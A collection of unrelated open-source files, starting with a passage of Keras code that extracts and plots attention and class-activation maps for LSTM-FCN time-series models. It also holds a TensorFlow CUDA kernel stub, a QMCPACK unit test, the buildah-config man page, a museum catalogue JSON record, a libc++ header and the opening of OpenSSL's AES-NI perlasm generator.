if not os.path.exists('lstm_features/'):
os.makedirs('lstm_features/')
output_shape = [X_train.shape[-1], 1, 1]
for i in range(X_train.shape[0]):
activations = get_outputs(model,
X_train[i, :, :][np.newaxis, ...],
eval_functions,
verbose=False)[0]
# print("activations", activations.shape)
attention_vector = activations.reshape((-1, 1, 1))
attention_vector = (attention_vector - attention_vector.min()) / (
attention_vector.max() - attention_vector.min())
attention_vector = (attention_vector * 2.) - 1.
attention_vector = resize(attention_vector, output_shape, mode='reflect', anti_aliasing=True)
attention_vector = attention_vector.reshape([1, -1])
train_attention_vectors.append(attention_vector)
for i in range(X_test.shape[0]):
activations = get_outputs(model,
X_test[i, :, :][np.newaxis, ...],
eval_functions,
verbose=False)[0]
# print("activations", activations.shape)
attention_vector = activations.reshape((-1, 1, 1))
attention_vector = (attention_vector - attention_vector.min()) / (
attention_vector.max() - attention_vector.min())
attention_vector = (attention_vector * 2.) - 1.
attention_vector = resize(attention_vector, output_shape, mode='reflect', anti_aliasing=True)
attention_vector = attention_vector.reshape([1, -1])
test_attention_vectors.append(attention_vector)
train_attention_vectors = np.array(train_attention_vectors)
test_attention_vectors = np.array(test_attention_vectors)
print("Train Attention Vectors Shape :", train_attention_vectors.shape)
print("Test Attentin Vectors Shape :", test_attention_vectors.shape)
if visualize_sequence:
# plot input sequence part that is paid attention too in detail
X_train_attention = train_attention_vectors * X_train
X_test_attention = test_attention_vectors * X_test
X_train_attention = X_train_attention.squeeze(1)
X_test_attention = X_test_attention.squeeze(1)
df = pd.DataFrame(X_test_attention)
df['label'] = y_test[:, 0]
df.to_csv('lstm_features/features.csv')
else:
# plot only attention chart
choice = np.random.randint(0, train_attention_vectors.shape[0])
train_df = pd.DataFrame({'attention (%)': train_attention_vectors[choice, 0]},
index=range(train_attention_vectors.shape[-1]))
train_df.plot(kind='bar',
title='Attention Mechanism (Train) as '
'a function of input'
' dimensions. Class = %d' % (
y_train[choice]
))
plt.show()
def visualize_cam(model: Model, dataset_id, dataset_prefix, class_id,
cutoff=None, normalize_timeseries=False, seed=0):
"""
Used to visualize the Class Activation Maps of the Keras Model.
Args:
model: A Keras Model.
dataset_id: Integer id representing the dataset index containd in
`utils/constants.py`.
dataset_prefix: Name of the dataset. Used for weight saving.
class_id: Index of the class whose activation is to be visualized.
cutoff: Optional integer which slices of the first `cutoff` timesteps
from the input signal.
normalize_timeseries: Bool / Integer. Determines whether to normalize
the timeseries.
If False, does not normalize the time series.
If True / int not equal to 2, performs standard sample-wise
z-normalization.
If 2: Performs full dataset z-normalization.
seed: Random seed number for Numpy.
"""
np.random.seed(seed)
X_train, y_train, _, _, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
_, sequence_length = calculate_dataset_metrics(X_train)
if sequence_length != MAX_SEQUENCE_LENGTH_LIST[dataset_id]:
if cutoff is None:
choice = cutoff_choice(dataset_id, sequence_length)
else:
assert cutoff in ['pre', 'post'], 'Cutoff parameter value must be either "pre" or "post"'
choice = cutoff
if choice not in ['pre', 'post']:
return
else:
X_train, _ = cutoff_sequence(X_train, _, choice, dataset_id, sequence_length)
model.load_weights("./weights/%s_weights.h5" % dataset_prefix)
class_weights = model.layers[-1].get_weights()[0]
conv_layers = [layer for layer in model.layers if layer.__class__.__name__ == 'Conv1D']
final_conv = conv_layers[-1].name
final_softmax = model.layers[-1].name
out_names = [final_conv, final_softmax]
if class_id > 0:
class_id = class_id - 1
y_train_ids = np.where(y_train[:, 0] == class_id)
sequence_input = X_train[y_train_ids[0], ...]
choice = np.random.choice(range(len(sequence_input)), 1)
sequence_input = sequence_input[choice, :, :]
eval_functions = build_function(model, out_names)
conv_out, predictions = get_outputs(model, sequence_input, eval_functions)
conv_out = conv_out[0, :, :] # (T, C)
conv_out = (conv_out - conv_out.min(axis=0, keepdims=True)) / \
(conv_out.max(axis=0, keepdims=True) - conv_out.min(axis=0, keepdims=True))
conv_out = (conv_out * 2.) - 1.
conv_out = conv_out.transpose((1, 0)) # (C, T)
conv_channels = conv_out.shape[0]
conv_cam = class_weights[:conv_channels, [class_id]] * conv_out
conv_cam = np.sum(conv_cam, axis=0)
conv_cam /= conv_cam.max()
sequence_input = sequence_input.reshape((-1, 1))
conv_cam = conv_cam.reshape((-1, 1))
sequence_df = pd.DataFrame(sequence_input,
index=range(sequence_input.shape[0]),
columns=range(sequence_input.shape[1]))
conv_cam_df = pd.DataFrame(conv_cam,
index=range(conv_cam.shape[0]),
columns=[1])
fig, axs = plt.subplots(2, 1, squeeze=False,
figsize=(6, 6))
class_label = class_id + 1
sequence_df.plot(title='Sequence (class = %d)' % (class_label),
subplots=False,
legend=None,
ax=axs[0][0])
conv_cam_df.plot(title='Convolution Class Activation Map (class = %d)' % (class_label),
subplots=False,
legend=None,
ax=axs[1][0])
plt.show()
def write_cam(model: Model, dataset_id, dataset_prefix,
cutoff=None, normalize_timeseries=False):
""" Same as visualize_cam, but writes the result data to a file. """
_, _, X_test, y_test, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
_, sequence_length = calculate_dataset_metrics(X_test)
if sequence_length != MAX_SEQUENCE_LENGTH_LIST[dataset_id]:
if cutoff is None:
choice = cutoff_choice(dataset_id, sequence_length)
else:
assert cutoff in ['pre', 'post'], 'Cutoff parameter value must be either "pre" or "post"'
choice = cutoff
if choice not in ['pre', 'post']:
return
else:
X_train, _ = cutoff_sequence(_, X_test, choice, dataset_id, sequence_length)
print("Weights path : ", "./weights/%s_weights.h5" % dataset_prefix)
model.load_weights("./weights/%s_weights.h5" % dataset_prefix)
class_weights = model.layers[-1].get_weights()[0]
conv_layers = [layer for layer in model.layers if layer.__class__.__name__ == 'Conv1D']
final_conv = conv_layers[-1].name
final_softmax = model.layers[-1].name
out_names = [final_conv, final_softmax]
eval_functions = build_function(model, out_names)
parts = os.path.split(dataset_prefix)
if len(parts) > 1:
basepath = os.path.join('cam_features', os.pathsep.join(parts[:-1]))
dataset_name = parts[-1]
else:
basepath = 'cam_features/'
dataset_name = dataset_prefix
if not os.path.exists(basepath):
os.makedirs(basepath)
cam_features = []
for i in range(X_test.shape[0]):
print("Sample %d running" % (i + 1))
y_id = y_test[i, 0]
sequence_input = X_test[[i], :, :]
conv_out, predictions = get_outputs(model, sequence_input, eval_functions)
conv_out = conv_out[0, :, :] # (T, C)
conv_out = conv_out.transpose((1, 0)) # (C, T)
conv_channels = conv_out.shape[0]
conv_cam = class_weights[:conv_channels, [int(y_id)]] * conv_out
conv_cam = np.mean(conv_cam, axis=0)
conv_cam = conv_cam.reshape((-1, 1))
cam_features.append(conv_cam)
cam_features = np.concatenate(cam_features, -1).transpose()
print("Num features = ", cam_features.shape)
conv_cam_df = pd.DataFrame(cam_features)
conv_cam_df.to_csv(basepath + '/%s_features_mean_unnormalized.csv' % dataset_name,
header=False, index=False)
def visualize_filters(model: Model, dataset_id, dataset_prefix,
conv_id=0, filter_id=0, seed=0, cutoff=None,
normalize_timeseries=False):
"""
Used to visualize the output filters of a particular convolution layer.
Args:
model: A Keras Model.
dataset_id: Integer id representing the dataset index containd in
`utils/constants.py`.
dataset_prefix: Name of the dataset. Used for weight saving.
conv_id: Convolution layer ID. Can be 0, 1 or 2 for LSTMFCN and
its univariate variants (as it uses 3 Conv blocks).
filter_id: ID of the filter that is under observation.
seed: Numpy random seed.
cutoff: Optional integer which slices of the first `cutoff` timesteps
from the input signal.
normalize_timeseries: Bool / Integer. Determines whether to normalize
the timeseries.
If False, does not normalize the time series.
If True / int not equal to 2, performs standard sample-wise
z-normalization.
If 2: Performs full dataset z-normalization.
"""
np.random.seed(seed)
assert conv_id >= 0 and conv_id < 3, "Convolution layer ID must be between 0 and 2"
X_train, y_train, _, _, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
_, sequence_length = calculate_dataset_metrics(X_train)
if sequence_length != MAX_SEQUENCE_LENGTH_LIST[dataset_id]:
if cutoff is None:
choice = cutoff_choice(dataset_id, sequence_length)
else:
assert cutoff in ['pre', 'post'], 'Cutoff parameter value must be either "pre" or "post"'
choice = cutoff
if choice not in ['pre', 'post']:
return
else:
X_train, _ = cutoff_sequence(X_train, _, choice, dataset_id, sequence_length)
model.load_weights("./weights/%s_weights.h5" % dataset_prefix)
conv_layers = [layer for layer in model.layers
if layer.__class__.__name__ == 'Conv1D']
conv_layer = conv_layers[conv_id]
conv_layer_name = conv_layer.name
eval_functions = build_function(model, [conv_layer_name])
save_dir = os.path.split(dataset_prefix)[0]
if not os.path.exists('cnn_filters/%s' % (save_dir)):
os.makedirs('cnn_filters/%s' % (save_dir))
dataset_name = os.path.split(dataset_prefix)[-1]
if dataset_name is None or len(dataset_name) == 0:
dataset_name = dataset_prefix
# Select single datapoint
sample_index = np.random.randint(0, X_train.shape[0])
y_id = y_train[sample_index, 0]
sequence_input = X_train[[sample_index], :, :]
# Get features of the cnn layer out
conv_out = get_outputs(model, sequence_input, eval_functions)[0]
conv_out = conv_out[0, :, :] # [T, C]
# select single filter
assert filter_id > 0 and filter_id < conv_out.shape[-1]
channel = conv_out[:, filter_id]
channel = channel.reshape((-1, 1))
conv_filters = pd.DataFrame(channel)
conv_filters.to_csv('cnn_filters/%s_features.csv' % (dataset_prefix), header=None, index=False)
sequence_input = sequence_input[0, :, :].transpose()
sequence_df = pd.DataFrame(sequence_input,
index=range(sequence_input.shape[0]))
conv_cam_df = pd.DataFrame(conv_filters,
index=range(conv_filters.shape[0]))
fig, axs = plt.subplots(2, 1, squeeze=False,
figsize=(6, 6))
class_label = y_id + 1
plt.rcParams.update({'font.size': 24})
sequence_df.plot(title='Dataset %s : Sequence ID = %d (class = %d)' % (dataset_name,
sample_index + 1,
class_label),
subplots=False,
legend=None,
ax=axs[0][0])
conv_cam_df.plot(title='Convolution Layer %d Filter ID %d (class = %d)' % (conv_id + 1,
filter_id + 1,
class_label),
subplots=False,
legend=None,
ax=axs[1][0])
# Formatting
plt.xlabel('Timesteps', axes=axs[0][0])
axs[0][0].set_ylabel('Value')
axs[1][0].set_ylabel('Value')
def mjrFormatter(x, pos):
return '{:.2f}'.format(x)
plt.gca().yaxis.set_major_formatter(FuncFormatter(mjrFormatter))
plt.show()
def extract_features(model: Model, dataset_id, dataset_prefix,
layer_name, cutoff=None, normalize_timeseries=False):
""" Same as visualize_features, but saves them to a file instead. """
layer_name = layer_name.lower()
assert layer_name in ['cnn', 'lstm', 'lstmfcn']
X_train, y_train, X_test, y_test, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
_, sequence_length = calculate_dataset_metrics(X_train)
if sequence_length != MAX_SEQUENCE_LENGTH_LIST[dataset_id]:
if cutoff is None:
choice = cutoff_choice(dataset_id, sequence_length)
else:
assert cutoff in ['pre', 'post'], 'Cutoff parameter value must be either "pre" or "post"'
choice = cutoff
if choice not in ['pre', 'post']:
return
else:
X_train, X_test = cutoff_sequence(X_train, X_test, choice, dataset_id, sequence_length)
model.load_weights("./weights/%s_weights.h5" % dataset_prefix)
conv_layers = [layer for layer in model.layers
if layer.__class__.__name__ == 'Conv1D']
lstm_layers = [layer for layer in model.layers
if layer.__class__.__name__ == 'LSTM' or
layer.__class__.__name__ == 'AttentionLSTM']
lstmfcn_layer = model.layers[-2]
if layer_name == 'cnn':
feature_layer = conv_layers[-1]
elif layer_name == 'lstm':
feature_layer = lstm_layers[-1]
else:
feature_layer = lstmfcn_layer
dataset_name = os.path.split(dataset_prefix)[-1]
if dataset_name is None or len(dataset_name) == 0:
dataset_name = dataset_prefix
save_dir = 'layer_features/%s/' % dataset_name
if not os.path.exists(save_dir):
os.makedirs(save_dir)
extraction_model = Model(model.input, feature_layer.output)
train_features = extraction_model.predict(X_train, batch_size=128)
test_features = extraction_model.predict(X_test, batch_size=128)
shape = train_features.shape
if len(shape) > 2:
train_features = train_features.reshape((shape[0], shape[1] * shape[2]))
shape = test_features.shape
if len(shape) > 2:
test_features = test_features.reshape((shape[0], shape[1] * shape[2]))
print("Train feature shape : ", train_features.shape, "Classes : ", len(np.unique(y_train)))
print("Test features shape : ", test_features.shape, "Classes : ", len(np.unique(y_test)))
np.save(save_dir + '%s_%s_train_features.npy' % (layer_name, dataset_name), train_features)
np.save(save_dir + '%s_%s_train_labels.npy' % (layer_name, dataset_name), y_train)
np.save(save_dir + '%s_%s_test_features.npy' % (layer_name, dataset_name), test_features)
np.save(save_dir + '%s_%s_test_labels.npy' % (layer_name, dataset_name), y_test)
print("Saved train feature vectors at %s" % (save_dir + '%s_%s_train_features.npy' % (layer_name, dataset_name)))
print("Saved test feature vectors at %s" % (save_dir + '%s_%s_test_features.npy' % (layer_name, dataset_name)))
print()
class MaskablePermute(Permute):
def __init__(self, dims, **kwargs):
super(MaskablePermute, self).__init__(dims, **kwargs)
self.supports_masking = True
| {
"pile_set_name": "Github"
} |
/* Copyright 2016 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#if GOOGLE_CUDA
#include "tensorflow/core/kernels/cwise_ops_gpu_common.cu.h"
namespace tensorflow {
namespace functor {
DEFINE_BINARY4(squared_difference, float, Eigen::half, double, int64);
} // namespace functor
} // namespace tensorflow
#endif // GOOGLE_CUDA
| {
"pile_set_name": "Github"
} |
//////////////////////////////////////////////////////////////////////////////////////
// This file is distributed under the University of Illinois/NCSA Open Source License.
// See LICENSE file in top directory for details.
//
// Copyright (c) 2019 QMCPACK developers.
//
// File developed by: Peter Doak, [email protected], Oak Ridge National Laboratory
//
// File created by: Peter Doak, [email protected], Oak Ridge National Laboratory
//////////////////////////////////////////////////////////////////////////////////////
#include "catch.hpp"
#include "QMCDrivers/VMC/VMCDriverInput.h"
#include "QMCDrivers/tests/ValidQMCInputSections.h"
#include "OhmmsData/Libxml2Doc.h"
namespace qmcplusplus
{
TEST_CASE("VMCDriverInput readXML", "[drivers]")
{
auto xml_test = [](const char* driver_xml) {
Libxml2Document doc;
bool okay = doc.parseFromString(driver_xml);
REQUIRE(okay);
xmlNodePtr node = doc.getRoot();
VMCDriverInput vmcdriver_input;
vmcdriver_input.readXML(node);
REQUIRE(vmcdriver_input.get_use_drift() == false);
};
std::for_each(testing::valid_vmc_input_sections.begin(), testing::valid_vmc_input_sections.end(), xml_test);
}
} // namespace qmcplusplus
| {
"pile_set_name": "Github"
} |
# buildah-config "1" "March 2017" "buildah"
## NAME
buildah\-config - Update image configuration settings.
## SYNOPSIS
**buildah config** [*options*] *container*
## DESCRIPTION
Updates one or more of the settings kept for a container.
## OPTIONS
**--add-history**
Add an entry to the image's history which will note changes to the settings for
**--cmd**, **--entrypoint**, **--env**, **--healthcheck**, **--label**,
**--onbuild**, **--port**, **--shell**, **--stop-signal**, **--user**,
**--volume**, and **--workingdir**.
Defaults to false.
Note: You can also override the default value of --add-history by setting the
BUILDAH\_HISTORY environment variable. `export BUILDAH_HISTORY=true`
**--annotation** *annotation*=*annotation*
Add an image *annotation* (e.g. annotation=*annotation*) to the image manifest
of any images which will be built using the specified container. Can be used multiple times.
If *annotation* has a trailing `-`, then the *annotation* is removed from the config.
**--arch** *architecture*
Set the target *architecture* for any images which will be built using the
specified container. By default, if the container was based on an image, that
image's target architecture is kept, otherwise the host's architecture is
recorded.
**--author** *author*
Set contact information for the *author* for any images which will be built
using the specified container.
**--cmd** *command*
Set the default *command* to run for containers based on any images which will
be built using the specified container. When used in combination with an
*entry point*, this specifies the default parameters for the *entry point*.
**--comment** *comment*
Set the image-level comment for any images which will be built using the
specified container.
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--created-by** *created*
Set the description of how the topmost layer was *created* for any images which
will be created using the specified container.
**--domainname** *domain*
Set the domainname to set when running containers based on any images built
using the specified container.
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--entrypoint** *"command"* | *'["command", "arg1", ...]'*
Set the *entry point* for containers based on any images which will be built
using the specified container. buildah supports two formats for entrypoint. It
can be specified as a simple string, or as a array of commands.
Note: When the entrypoint is specified as a string, container runtimes will
ignore the `cmd` value of the container image. However if you use the array
form, then the cmd will be appended onto the end of the entrypoint cmd and be
executed together.
**--env** *env=value*
Add a value (e.g. env=*value*) to the environment for containers based on any
images which will be built using the specified container. Can be used multiple times.
If *env* has a trailing `-`, then the *env* is removed from the config.
**--healthcheck** *command*
Specify a command which should be run to check if a container is running correctly.
Values can be *NONE*, "*CMD* ..." (run the specified command directly), or
"*CMD-SHELL* ..." (run the specified command using the system's shell), or the
empty value (remove a previously-set value and related settings).
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--healthcheck-interval** *interval*
Specify how often the command specified using the *--healthcheck* option should
be run.
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--healthcheck-retries** *count*
Specify how many times the command specified using the *--healthcheck* option
can fail before the container is considered to be unhealthy.
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--healthcheck-start-period** *interval*
Specify how much time can elapse after a container has started before a failure
to run the command specified using the *--healthcheck* option should be treated
as an indication that the container is failing. During this time period,
failures will be attributed to the container not yet having fully started, and
will not be counted as errors. After the command succeeds, or the time period
has elapsed, failures will be counted as errors.
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--healthcheck-timeout** *interval*
Specify how long to wait after starting the command specified using the
*--healthcheck* option to wait for the command to return its exit status. If
the command has not returned within this time, it should be considered to have
failed.
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--history-comment** *comment*
Sets a comment on the topmost layer in any images which will be created
using the specified container.
**--hostname** *host*
Set the hostname to set when running containers based on any images built using
the specified container.
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--label** *label*=*value*
Add an image *label* (e.g. label=*value*) to the image configuration of any
images which will be built using the specified container. Can be used multiple times.
If *label* has a trailing `-`, then the *label* is removed from the config.
**--onbuild** *onbuild command*
Add an ONBUILD command to the image. ONBUILD commands are automatically run
when images are built based on the image you are creating.
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--os** *operating system*
Set the target *operating system* for any images which will be built using
the specified container. By default, if the container was based on an image,
its OS is kept, otherwise the host's OS's name is recorded.
**--port** *port*
Add a *port* to expose when running containers based on any images which
will be built using the specified container. Can be used multiple times.
**--shell** *shell*
Set the default *shell* to run inside of the container image.
The shell instruction allows the default shell used for the shell form of commands to be overridden. The default shell for Linux containers is "/bin/sh -c".
Note: this setting is not present in the OCIv1 image format, so it is discarded when writing images using OCIv1 formats.
**--stop-signal** *signal*
Set default *stop signal* for container. This signal will be sent when container is stopped, default is SIGINT.
**--user** *user*[:*group*]
Set the default *user* to be used when running containers based on this image.
The user can be specified as a user name
or UID, optionally followed by a group name or GID, separated by a colon (':').
If names are used, the container should include entries for those names in its
*/etc/passwd* and */etc/group* files.
**--volume** *volume*
Add a location in the directory tree which should be marked as a *volume* in any images which will be built using the specified container. Can be used multiple times. If *volume* has a trailing `-`, and is already set, then the *volume* is removed from the config.
**--workingdir** *directory*
Set the initial working *directory* for containers based on images which will
be built using the specified container.
## EXAMPLE
buildah config --author='Jane Austen' --workingdir='/etc/mycontainers' containerID
buildah config --entrypoint /entrypoint.sh containerID
buildah config --entrypoint '[ "/entrypoint.sh", "dev" ]' containerID
buildah config --env foo=bar --env PATH=$PATH containerID
buildah config --env foo- containerID
buildah config --label Name=Mycontainer --label Version=1.0 containerID
buildah config --label Name- containerID
buildah config --annotation note=myNote containerID
buildah config --annotation note-
buildah config --volume /usr/myvol containerID
buildah config --volume /usr/myvol- containerID
## SEE ALSO
buildah(1)
| {
"pile_set_name": "Github"
} |
{
"id": "35262185",
"url": "https:\/\/collection.cooperhewitt.org\/types\/35262185\/",
"name": "grille",
"count_objects": "1",
"supersedes": "0",
"superseded_by": "0"
} | {
"pile_set_name": "Github"
} |
// -*- C++ -*-
//===------------------------- unordered_set ------------------------------===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
#ifndef _LIBCPP_EXPERIMENTAL_UNORDERED_SET
#define _LIBCPP_EXPERIMENTAL_UNORDERED_SET
/*
experimental/unordered_set synopsis
// C++1z
namespace std {
namespace experimental {
inline namespace fundamentals_v1 {
namespace pmr {
template <class T, class Hash = hash<T>, class Pred = equal_to<T>>
using unordered_set = std::unordered_set<T, Hash, Pred,
polymorphic_allocator<T>>;
template <class T, class Hash = hash<T>, class Pred = equal_to<T>>
using unordered_multiset = std::unordered_multiset<T, Hash, Pred,
polymorphic_allocator<T>>;
} // namespace pmr
} // namespace fundamentals_v1
} // namespace experimental
} // namespace std
*/
#include <experimental/__config>
#include <unordered_set>
#include <experimental/memory_resource>
#if !defined(_LIBCPP_HAS_NO_PRAGMA_SYSTEM_HEADER)
#pragma GCC system_header
#endif
_LIBCPP_BEGIN_NAMESPACE_LFTS_PMR
template <class _Value,
class _Hash = hash<_Value>, class _Pred = equal_to<_Value>>
using unordered_set = _VSTD::unordered_set<_Value, _Hash, _Pred,
polymorphic_allocator<_Value>>;
template <class _Value,
class _Hash = hash<_Value>, class _Pred = equal_to<_Value>>
using unordered_multiset = _VSTD::unordered_multiset<_Value, _Hash, _Pred,
polymorphic_allocator<_Value>>;
_LIBCPP_END_NAMESPACE_LFTS_PMR
#endif /* _LIBCPP_EXPERIMENTAL_UNORDERED_SET */
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env perl
#
# ====================================================================
# Written by Andy Polyakov <[email protected]> for the OpenSSL
# project. The module is, however, dual licensed under OpenSSL and
# CRYPTOGAMS licenses depending on where you obtain it. For further
# details see http://www.openssl.org/~appro/cryptogams/.
# ====================================================================
#
# This module implements support for Intel AES-NI extension. In
# OpenSSL context it's used with Intel engine, but can also be used as
# drop-in replacement for crypto/aes/asm/aes-x86_64.pl [see below for
# details].
#
# Performance.
#
# Given aes(enc|dec) instructions' latency asymptotic performance for
# non-parallelizable modes such as CBC encrypt is 3.75 cycles per byte
# processed with 128-bit key. And given their throughput asymptotic
# performance for parallelizable modes is 1.25 cycles per byte. Being
# asymptotic limit it's not something you commonly achieve in reality,
# but how close does one get? Below are results collected for
# different modes and block sized. Pairs of numbers are for en-/
# decryption.
#
# 16-byte 64-byte 256-byte 1-KB 8-KB
# ECB 4.25/4.25 1.38/1.38 1.28/1.28 1.26/1.26 1.26/1.26
# CTR 5.42/5.42 1.92/1.92 1.44/1.44 1.28/1.28 1.26/1.26
# CBC 4.38/4.43 4.15/1.43 4.07/1.32 4.07/1.29 4.06/1.28
# CCM 5.66/9.42 4.42/5.41 4.16/4.40 4.09/4.15 4.06/4.07
# OFB 5.42/5.42 4.64/4.64 4.44/4.44 4.39/4.39 4.38/4.38
# CFB 5.73/5.85 5.56/5.62 5.48/5.56 5.47/5.55 5.47/5.55
#
# ECB, CTR, CBC and CCM results are free from EVP overhead. This means
# that otherwise used 'openssl speed -evp aes-128-??? -engine aesni
# [-decrypt]' will exhibit 10-15% worse results for smaller blocks.
# The results were collected with specially crafted speed.c benchmark
# in order to compare them with results reported in "Intel Advanced
# Encryption Standard (AES) New Instruction Set" White Paper Revision
# 3.0 dated May 2010. All above results are consistently better. This
# module also provides better performance for block sizes smaller than
# 128 bytes in points *not* represented in the above table.
#
# Looking at the results for 8-KB buffer.
#
# CFB and OFB results are far from the limit, because implementation
# uses "generic" CRYPTO_[c|o]fb128_encrypt interfaces relying on
# single-block aesni_encrypt, which is not the most optimal way to go.
# CBC encrypt result is unexpectedly high and there is no documented
# explanation for it. Seemingly there is a small penalty for feeding
# the result back to AES unit the way it's done in CBC mode. There is
# nothing one can do and the result appears optimal. CCM result is
# identical to CBC, because CBC-MAC is essentially CBC encrypt without
# saving output. CCM CTR "stays invisible," because it's neatly
# interleaved wih CBC-MAC. This provides ~30% improvement over
# "straghtforward" CCM implementation with CTR and CBC-MAC performed
# disjointly. Parallelizable modes practically achieve the theoretical
# limit.
#
# Looking at how results vary with buffer size.
#
# Curves are practically saturated at 1-KB buffer size. In most cases
# "256-byte" performance is >95%, and "64-byte" is ~90% of "8-KB" one.
# CTR curve doesn't follow this pattern and is "slowest" changing one
# with "256-byte" result being 87% of "8-KB." This is because overhead
# in CTR mode is most computationally intensive. Small-block CCM
# decrypt is slower than encrypt, because first CTR and last CBC-MAC
# iterations can't be interleaved.
#
# Results for 192- and 256-bit keys.
#
# EVP-free results were observed to scale perfectly with number of
# rounds for larger block sizes, i.e. 192-bit result being 10/12 times
# lower and 256-bit one - 10/14. Well, in CBC encrypt case differences
# are a tad smaller, because the above mentioned penalty biases all
# results by same constant value. In similar way function call
# overhead affects small-block performance, as well as OFB and CFB
# results. Differences are not large, most common coefficients are
# 10/11.7 and 10/13.4 (as opposite to 10/12.0 and 10/14.0), but one
# observe even 10/11.2 and 10/12.4 (CTR, OFB, CFB)...
# January 2011
#
# While Westmere processor features 6 cycles latency for aes[enc|dec]
# instructions, which can be scheduled every second cycle, Sandy
# Bridge spends 8 cycles per instruction, but it can schedule them
# every cycle. This means that code targeting Westmere would perform
# suboptimally on Sandy Bridge. Therefore this update.
#
# In addition, non-parallelizable CBC encrypt (as well as CCM) is
# optimized. Relative improvement might appear modest, 8% on Westmere,
# but in absolute terms it's 3.77 cycles per byte encrypted with
# 128-bit key on Westmere, and 5.07 - on Sandy Bridge. These numbers
# should be compared to asymptotic limits of 3.75 for Westmere and
# 5.00 for Sandy Bridge. Actually, the fact that they get this close
# to asymptotic limits is quite amazing. Indeed, the limit is
# calculated as latency times number of rounds, 10 for 128-bit key,
# and divided by 16, the number of bytes in block, or in other words
# it accounts *solely* for aesenc instructions. But there are extra
# instructions, and numbers so close to the asymptotic limits mean
# that it's as if it takes as little as *one* additional cycle to
# execute all of them. How is it possible? It is possible thanks to
# out-of-order execution logic, which manages to overlap post-
# processing of previous block, things like saving the output, with
# actual encryption of current block, as well as pre-processing of
# current block, things like fetching input and xor-ing it with
# 0-round element of the key schedule, with actual encryption of
# previous block. Keep this in mind...
#
# For parallelizable modes, such as ECB, CBC decrypt, CTR, higher
# performance is achieved by interleaving instructions working on
# independent blocks. In which case asymptotic limit for such modes
# can be obtained by dividing above mentioned numbers by AES
# instructions' interleave factor. Westmere can execute at most 3
# instructions at a time, meaning that optimal interleave factor is 3,
# and that's where the "magic" number of 1.25 come from. "Optimal
# interleave factor" means that increase of interleave factor does
# not improve performance. The formula has proven to reflect reality
# pretty well on Westmere... Sandy Bridge on the other hand can
# execute up to 8 AES instructions at a time, so how does varying
# interleave factor affect the performance? Here is table for ECB
# (numbers are cycles per byte processed with 128-bit key):
#
# instruction interleave factor 3x 6x 8x
# theoretical asymptotic limit 1.67 0.83 0.625
# measured performance for 8KB block 1.05 0.86 0.84
#
# "as if" interleave factor 4.7x 5.8x 6.0x
#
# Further data for other parallelizable modes:
#
# CBC decrypt 1.16 0.93 0.93
# CTR 1.14 0.91 n/a
#
# Well, given 3x column it's probably inappropriate to call the limit
# asymptotic, if it can be surpassed, isn't it? What happens there?
# Rewind to CBC paragraph for the answer. Yes, out-of-order execution
# magic is responsible for this. Processor overlaps not only the
# additional instructions with AES ones, but even AES instuctions
# processing adjacent triplets of independent blocks. In the 6x case
# additional instructions still claim disproportionally small amount
# of additional cycles, but in 8x case number of instructions must be
# a tad too high for out-of-order logic to cope with, and AES unit
# remains underutilized... As you can see 8x interleave is hardly
# justifiable, so there no need to feel bad that 32-bit aesni-x86.pl
# utilizies 6x interleave because of limited register bank capacity.
#
# Higher interleave factors do have negative impact on Westmere
# performance. While for ECB mode it's negligible ~1.5%, other
# parallelizables perform ~5% worse, which is outweighed by ~25%
# improvement on Sandy Bridge. To balance regression on Westmere
# CTR mode was implemented with 6x aesenc interleave factor.
# April 2011
#
# Add aesni_xts_[en|de]crypt. Westmere spends 1.33 cycles processing
# one byte out of 8KB with 128-bit key, Sandy Bridge - 0.97. Just like
# in CTR mode AES instruction interleave factor was chosen to be 6x.
$PREFIX="aesni"; # if $PREFIX is set to "AES", the script
# generates drop-in replacement for
# crypto/aes/asm/aes-x86_64.pl:-)
$flavour = shift;
$output = shift;
if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
die "can't locate x86_64-xlate.pl";
open OUT,"| \"$^X\" $xlate $flavour $output";
*STDOUT=*OUT;
$movkey = $PREFIX eq "aesni" ? "movups" : "movups";
@_4args=$win64? ("%rcx","%rdx","%r8", "%r9") : # Win64 order
("%rdi","%rsi","%rdx","%rcx"); # Unix order
$code=".text\n";
$rounds="%eax"; # input to and changed by aesni_[en|de]cryptN !!!
# this is natural Unix argument order for public $PREFIX_[ecb|cbc]_encrypt ...
$inp="%rdi";
$out="%rsi";
$len="%rdx";
$key="%rcx"; # input to and changed by aesni_[en|de]cryptN !!!
$ivp="%r8"; # cbc, ctr, ...
$rnds_="%r10d"; # backup copy for $rounds
$key_="%r11"; # backup copy for $key
